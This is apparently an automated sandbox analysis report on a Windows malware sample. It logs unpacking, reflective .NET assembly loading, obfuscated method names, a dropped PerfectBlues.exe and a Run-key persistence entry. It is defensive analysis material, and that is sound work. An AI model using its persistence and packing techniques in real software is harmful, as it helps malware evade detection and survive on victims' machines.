Classification label: mal100.evad.winEXE@3/1@2/2

Source: C:\Users\user\Desktop\hoTwj68T1D.exe

Code function: 1_2_0040A055 FindResourceA,FreeResource,

1_2_0040A055

Source: C:\Users\user\Desktop\hoTwj68T1D.exe

File created: C:\Users\user\Documents\PerfectBlues

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Mutant created: NULL
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Mutant created: \Sessions\1\BaseNamedObjects\mono1234

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

File created: C:\Users\user\AppData\Local\Temp\gokqos.exe

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Users\user\Desktop\hoTwj68T1D.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: hoTwj68T1D.exe

ReversingLabs: Detection: 57%

Source: C:\Users\user\Desktop\hoTwj68T1D.exe

File read: C:\Users\user\Desktop\hoTwj68T1D.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\hoTwj68T1D.exe "C:\Users\user\Desktop\hoTwj68T1D.exe"
Source: C:\Users\user\Desktop\hoTwj68T1D.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
Source: C:\Users\user\Desktop\hoTwj68T1D.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"	Jump to behavior

Source: C:\Users\user\Desktop\hoTwj68T1D.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\hoTwj68T1D.exe	Section loaded: k7rn7l32.dll	Jump to behavior
Source: C:\Users\user\Desktop\hoTwj68T1D.exe	Section loaded: ntd3ll.dll	Jump to behavior
Source: C:\Users\user\Desktop\hoTwj68T1D.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\hoTwj68T1D.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: ncryptsslp.dll	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: hoTwj68T1D.exe

Static file information: File size 1958096 > 1048576

Source: hoTwj68T1D.exe

Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x13ac00

Source:	Binary string: Tsjbteflmax.pdb source: csc.exe, csc.exe, 00000003.00000002.4659942113.0000000009AC0000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000003.2441546726.000000000885E000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.2441546726.000000000867D000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: csc.exe, 00000003.00000002.4658171446.000000000764B000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.4661171368.000000000A630000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000003.2441546726.0000000008995000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: csc.exe, 00000003.00000002.4658171446.000000000764B000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.4661171368.000000000A630000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000003.2441546726.0000000008995000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: csc.exe, 00000003.00000003.2441546726.000000000885E000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.4660568306.0000000009C80000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000003.2441546726.0000000008995000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: csc.exe, 00000003.00000003.2441546726.000000000885E000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.4660568306.0000000009C80000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000003.2441546726.0000000008995000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

Detected unpacking (creates a PE file in dynamic memory)

Source: C:\Users\user\Desktop\hoTwj68T1D.exe

Unpacked PE file: 1.2.hoTwj68T1D.exe.2240000.2.unpack

.NET source code contains method to dynamically call methods (often used by packers)

Source: 1.2.hoTwj68T1D.exe.4d44be.1.raw.unpack, TemplateConverter.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 3.2.csc.exe.9ac0000.3.raw.unpack, t9S849sA4DbtdhgyMHE.cs	.Net Code: Type.GetTypeFromHandle(zPv2cPFOG4AqiuIxB4F.jLqCFMFV92(16777307)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(zPv2cPFOG4AqiuIxB4F.jLqCFMFV92(16777250)),Type.GetTypeFromHandle(zPv2cPFOG4AqiuIxB4F.jLqCFMFV92(16777305))})
Source: 3.3.csc.exe.885ef40.7.raw.unpack, t9S849sA4DbtdhgyMHE.cs	.Net Code: Type.GetTypeFromHandle(zPv2cPFOG4AqiuIxB4F.jLqCFMFV92(16777307)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(zPv2cPFOG4AqiuIxB4F.jLqCFMFV92(16777250)),Type.GetTypeFromHandle(zPv2cPFOG4AqiuIxB4F.jLqCFMFV92(16777305))})

.NET source code contains potential unpacker

Source: 1.2.hoTwj68T1D.exe.4d44be.1.raw.unpack, VirtualSender.cs	.Net Code: TestSender System.Reflection.Assembly.Load(byte[])
Source: 3.2.csc.exe.9ac0000.3.raw.unpack, AssemblyLoader.cs	.Net Code: ReadFromEmbeddedResources System.Reflection.Assembly.Load(byte[])
Source: 3.2.csc.exe.9ac0000.3.raw.unpack, zodLG9FZrIPND6UmR6e.cs	.Net Code: Y5Bv2BFqXM
Source: 3.2.csc.exe.9ac0000.3.raw.unpack, zodLG9FZrIPND6UmR6e.cs	.Net Code: XHXoRq6nkj
Source: 3.2.csc.exe.a630000.6.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 3.2.csc.exe.a630000.6.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 3.2.csc.exe.a630000.6.raw.unpack, XmlSerializationHelper.cs	.Net Code: ReadObjectProperties
Source: 3.2.csc.exe.9c80000.5.raw.unpack, TypeModel.cs	.Net Code: TryDeserializeList
Source: 3.2.csc.exe.9c80000.5.raw.unpack, ListDecorator.cs	.Net Code: Read
Source: 3.2.csc.exe.9c80000.5.raw.unpack, TypeSerializer.cs	.Net Code: CreateInstance
Source: 3.2.csc.exe.9c80000.5.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateInstance
Source: 3.2.csc.exe.9c80000.5.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateIfNull

Yara detected Costura Assembly Loader

Source: Yara match	File source: 3.2.csc.exe.8606ec0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.csc.exe.9c20000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.4659180152.0000000008582000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4660531571.0000000009C20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4658171446.00000000073E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: csc.exe PID: 6536, type: MEMORYSTR

Source: C:\Users\user\Desktop\hoTwj68T1D.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
Source: C:\Users\user\Desktop\hoTwj68T1D.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"			Jump to behavior

Source: C:\Users\user\Desktop\hoTwj68T1D.exe	Code function: 1_2_00436188 push ecx; ret	1_2_00436197
Source: C:\Users\user\Desktop\hoTwj68T1D.exe	Code function: 1_2_00436198 push ecx; ret	1_2_004361AC
Source: C:\Users\user\Desktop\hoTwj68T1D.exe	Code function: 1_2_0040C258 push ecx; mov dword ptr [esp], edx	1_2_0040C25A
Source: C:\Users\user\Desktop\hoTwj68T1D.exe	Code function: 1_2_00410480 push esp; retf 0041h	1_2_00410485
Source: C:\Users\user\Desktop\hoTwj68T1D.exe	Code function: 1_2_0040E7DC push ecx; mov dword ptr [esp], edx	1_2_0040E7DE
Source: C:\Users\user\Desktop\hoTwj68T1D.exe	Code function: 1_2_00404B19 push eax; ret	1_2_00404B55
Source: C:\Users\user\Desktop\hoTwj68T1D.exe	Code function: 1_2_00408BD0 push 00408C0Dh; ret	1_2_00408C05
Source: C:\Users\user\Desktop\hoTwj68T1D.exe	Code function: 1_2_00404DC8 push 00404E71h; ret	1_2_00404E69
Source: C:\Users\user\Desktop\hoTwj68T1D.exe	Code function: 1_2_0041AE10 push esp; retf 0041h	1_2_0041AE15
Source: C:\Users\user\Desktop\hoTwj68T1D.exe	Code function: 1_2_00412EC8 push 00412F2Bh; ret	1_2_00412F23
Source: C:\Users\user\Desktop\hoTwj68T1D.exe	Code function: 1_2_00444F54 push ecx; mov dword ptr [esp], ecx	1_2_00444F59
Source: C:\Users\user\Desktop\hoTwj68T1D.exe	Code function: 1_2_00455078 push 0045528Ah; ret	1_2_00455282
Source: C:\Users\user\Desktop\hoTwj68T1D.exe	Code function: 1_2_004130D0 push esp; retf 0041h	1_2_004130D5
Source: C:\Users\user\Desktop\hoTwj68T1D.exe	Code function: 1_2_004090D3 push ds; ret	1_2_004090D4
Source: C:\Users\user\Desktop\hoTwj68T1D.exe	Code function: 1_2_004090BD push ds; ret	1_2_004090D1
Source: C:\Users\user\Desktop\hoTwj68T1D.exe	Code function: 1_2_004552D4 push 004554E0h; ret	1_2_004554D8
Source: C:\Users\user\Desktop\hoTwj68T1D.exe	Code function: 1_2_004892B0 push ecx; mov dword ptr [esp], edx	1_2_004892B2
Source: C:\Users\user\Desktop\hoTwj68T1D.exe	Code function: 1_2_0041B508 push ecx; mov dword ptr [esp], ecx	1_2_0041B50D
Source: C:\Users\user\Desktop\hoTwj68T1D.exe	Code function: 1_2_0048771C push ecx; mov dword ptr [esp], edx	1_2_00487721
Source: C:\Users\user\Desktop\hoTwj68T1D.exe	Code function: 1_2_004317FC push ecx; mov dword ptr [esp], edx	1_2_00431801
Source: C:\Users\user\Desktop\hoTwj68T1D.exe	Code function: 1_2_0040585C push ecx; mov dword ptr [esp], eax	1_2_0040585D
Source: C:\Users\user\Desktop\hoTwj68T1D.exe	Code function: 1_2_004878A8 push ecx; mov dword ptr [esp], edx	1_2_004878AA
Source: C:\Users\user\Desktop\hoTwj68T1D.exe	Code function: 1_2_0040F934 push ecx; mov dword ptr [esp], edx	1_2_0040F939
Source: C:\Users\user\Desktop\hoTwj68T1D.exe	Code function: 1_2_00431B98 push ecx; mov dword ptr [esp], edx	1_2_00431B9D
Source: C:\Users\user\Desktop\hoTwj68T1D.exe	Code function: 1_2_00487CA8 push ecx; mov dword ptr [esp], edx	1_2_00487CAD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 3_2_07153174 pushfd ; iretd	3_2_07153181
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 3_2_09B9FCF0 pushad ; iretd	3_2_09B9FCF1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 3_2_09BAB14A push BE000000h; ret	3_2_09BAB155
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 3_2_09BA0CE6 push 8B000001h; iretd	3_2_09BA0CEB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 3_2_09BACF08 push esp; ret	3_2_09BACF09
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 3_2_09CEC6F8 push 9009ECC7h; ret	3_2_09CEC6FD

Source: 3.2.csc.exe.9ac0000.3.raw.unpack, yKT1w3JGiFb7j6mCeNY.cs	High entropy of concatenated method names: 'zibJ5rQTcx', 'MIOk9xBnXNpnlKsPkAZ', 'nDfTchBpiLIKb8YGtdl', 'm2GJrQ2vnm', 'lsTJfJ1nsY', 'p3TJRnum9T', 'qCLJwy7Kmr', 'lWbJmIP7qS', 'jL2J6y1JDP', 'zK4JKm2vK0'
Source: 3.2.csc.exe.9ac0000.3.raw.unpack, VpP0QgbUGOi3w4TvJpo.cs	High entropy of concatenated method names: 'vFZbajSeiV', 'hHSQ4IBe0K6Ay7SNRKM', 'MIJ1JABcrkZjIaMcu8j', 'gllb3fmoy3', 'QdvbQhW3nL', 'ioXbXP67Zt', 'aYoZ8qBa2ti8LwA16BR', 'UyA4XwBReGTlgl3iYTy'
Source: 3.2.csc.exe.9ac0000.3.raw.unpack, VR5DVnDJxZ1eq899O3.cs	High entropy of concatenated method names: 'kVY53EFlL', 'MOd1B1VH3', 'FrTuk8GMh', 'K7AYstWdy', 'mSY7Cbpwk', 'ijOVEZC8J', 'zvbkiO0uD', 'wPoqg0wFg', 'IhiJOr4Mv3OjkftnmLn', 'pSyHhQ4rQ1q6Mva35pA'
Source: 3.2.csc.exe.9ac0000.3.raw.unpack, t9S849sA4DbtdhgyMHE.cs	High entropy of concatenated method names: 'Mg3MqqOHH3blogK8PoF', 'VeOIthOTlEAxPscI6s3', 'HD3F94gTAl', 'vh0ry9Sq2v', 'IScFsfcE53', 'HBTFIOZvux', 'S10FFF99ZG', 'NxrFjdF0h5', 'XSpCsD72qP', 'OANsUjKqmf'
Source: 3.2.csc.exe.9ac0000.3.raw.unpack, YT5sTjWje3EeKLxM3V.cs	High entropy of concatenated method names: 'vAVQE4GDS', 'T4wXnUXD3', 'Yx0g3LATK', 'K7BdsvCNr', 'R1oieSYPd', 'MPeyCMISW', 'J1gK5IGgj', 'LVRG7cOhG', 'lmOaTIjqE', 'pGQRMqcVh'
Source: 3.2.csc.exe.9ac0000.3.raw.unpack, Wgn0QkbcVNPjcmLIMIp.cs	High entropy of concatenated method names: 'fAdbZlTYcM', 'JSJH7JB1MUS7kFqoi14', 'P7RrYXBuRu2hWBVUfOl', 'KEbb5gt4mf', 'EVaRxKB77bwmycUCbPT', 'swmbIWBVUVw5XupRDjH', 'dDGbrbNPDi', 'e2Pbf8mOik', 'SqHdUDBDmPCPSv1vL4H', 'Gesvo2BE24c0xyEJV0p'
Source: 3.2.csc.exe.9ac0000.3.raw.unpack, zodLG9FZrIPND6UmR6e.cs	High entropy of concatenated method names: 'c0MSKiJ76j', 'o4PSe90dKm', 'p2HScqnEXX', 'ahcSMDacO9', 'EL9SrkI5PI', 'P4VSfmT8QC', 'tgXSZSVKZG', 'PW4jxd3dH9', 'YyhSDUpfBy', 'N1tSERDsS8'
Source: 3.2.csc.exe.9ac0000.3.raw.unpack, dybu1BFh9y6FiLH1kFy.cs	High entropy of concatenated method names: 'uofFRoIaNx', 'mpgFwNyKay', 'c2iFm6tZRZ', 'rOsF66xR9D', 't2UFKZLWyy', 'lu6Fexm26t', 'SiRFckL42m', 'w6iFMvfFuS', 'opbFrN7AcT', 'sYaFfKl9qt'
Source: 3.3.csc.exe.885ef40.7.raw.unpack, VR5DVnDJxZ1eq899O3.cs	High entropy of concatenated method names: 'kVY53EFlL', 'MOd1B1VH3', 'FrTuk8GMh', 'K7AYstWdy', 'mSY7Cbpwk', 'ijOVEZC8J', 'zvbkiO0uD', 'wPoqg0wFg', 'IhiJOr4Mv3OjkftnmLn', 'pSyHhQ4rQ1q6Mva35pA'
Source: 3.3.csc.exe.885ef40.7.raw.unpack, t9S849sA4DbtdhgyMHE.cs	High entropy of concatenated method names: 'Mg3MqqOHH3blogK8PoF', 'VeOIthOTlEAxPscI6s3', 'HD3F94gTAl', 'vh0ry9Sq2v', 'IScFsfcE53', 'HBTFIOZvux', 'S10FFF99ZG', 'NxrFjdF0h5', 'XSpCsD72qP', 'OANsUjKqmf'
Source: 3.3.csc.exe.885ef40.7.raw.unpack, YT5sTjWje3EeKLxM3V.cs	High entropy of concatenated method names: 'vAVQE4GDS', 'T4wXnUXD3', 'Yx0g3LATK', 'K7BdsvCNr', 'R1oieSYPd', 'MPeyCMISW', 'J1gK5IGgj', 'LVRG7cOhG', 'lmOaTIjqE', 'pGQRMqcVh'
Source: 3.3.csc.exe.885ef40.7.raw.unpack, zodLG9FZrIPND6UmR6e.cs	High entropy of concatenated method names: 'c0MSKiJ76j', 'o4PSe90dKm', 'p2HScqnEXX', 'ahcSMDacO9', 'EL9SrkI5PI', 'P4VSfmT8QC', 'tgXSZSVKZG', 'PW4jxd3dH9', 'YyhSDUpfBy', 'N1tSERDsS8'
Source: 3.3.csc.exe.885ef40.7.raw.unpack, dybu1BFh9y6FiLH1kFy.cs	High entropy of concatenated method names: 'uofFRoIaNx', 'mpgFwNyKay', 'c2iFm6tZRZ', 'rOsF66xR9D', 't2UFKZLWyy', 'lu6Fexm26t', 'SiRFckL42m', 'w6iFMvfFuS', 'opbFrN7AcT', 'sYaFfKl9qt'

Persistence and Installation Behavior

Drops PE files to the document folder of the user

Source: C:\Users\user\Desktop\hoTwj68T1D.exe

File created: C:\Users\user\Documents\PerfectBlues\Bin\PerfectBlues.exe

Jump to dropped file

Source: C:\Users\user\Desktop\hoTwj68T1D.exe

File created: C:\Users\user\Documents\PerfectBlues\Bin\PerfectBlues.exe

Jump to dropped file

Source: C:\Users\user\Desktop\hoTwj68T1D.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run PerfectBlues			Jump to behavior
Source: C:\Users\user\Desktop\hoTwj68T1D.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run PerfectBlues			Jump to behavior

Source: C:\Users\user\Desktop\hoTwj68T1D.exe	Code function: 1_2_004264C0 IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,	1_2_004264C0
Source: C:\Users\user\Desktop\hoTwj68T1D.exe	Code function: 1_2_004264C0 IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,	1_2_004264C0
Source: C:\Users\user\Desktop\hoTwj68T1D.exe	Code function: 1_2_00418536 IsIconic,SetWindowPos,	1_2_00418536
Source: C:\Users\user\Desktop\hoTwj68T1D.exe	Code function: 1_2_00418538 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,	1_2_00418538
Source: C:\Users\user\Desktop\hoTwj68T1D.exe	Code function: 1_2_00426A48 IsIconic,SetActiveWindow,	1_2_00426A48
Source: C:\Users\user\Desktop\hoTwj68T1D.exe	Code function: 1_2_00426A90 IsIconic,SetActiveWindow,SetFocus,	1_2_00426A90
Source: C:\Users\user\Desktop\hoTwj68T1D.exe	Code function: 1_2_00418C98 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,	1_2_00418C98
Source: C:\Users\user\Desktop\hoTwj68T1D.exe	Code function: 1_2_004251A0 SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,	1_2_004251A0
Source: C:\Users\user\Desktop\hoTwj68T1D.exe	Code function: 1_2_00417E00 IsIconic,GetCapture,	1_2_00417E00

Source: C:\Users\user\Desktop\hoTwj68T1D.exe

Code function: 1_2_004219EC GetVersion,SetErrorMode,LoadLibraryA,SetErrorMode,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,

1_2_004219EC

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
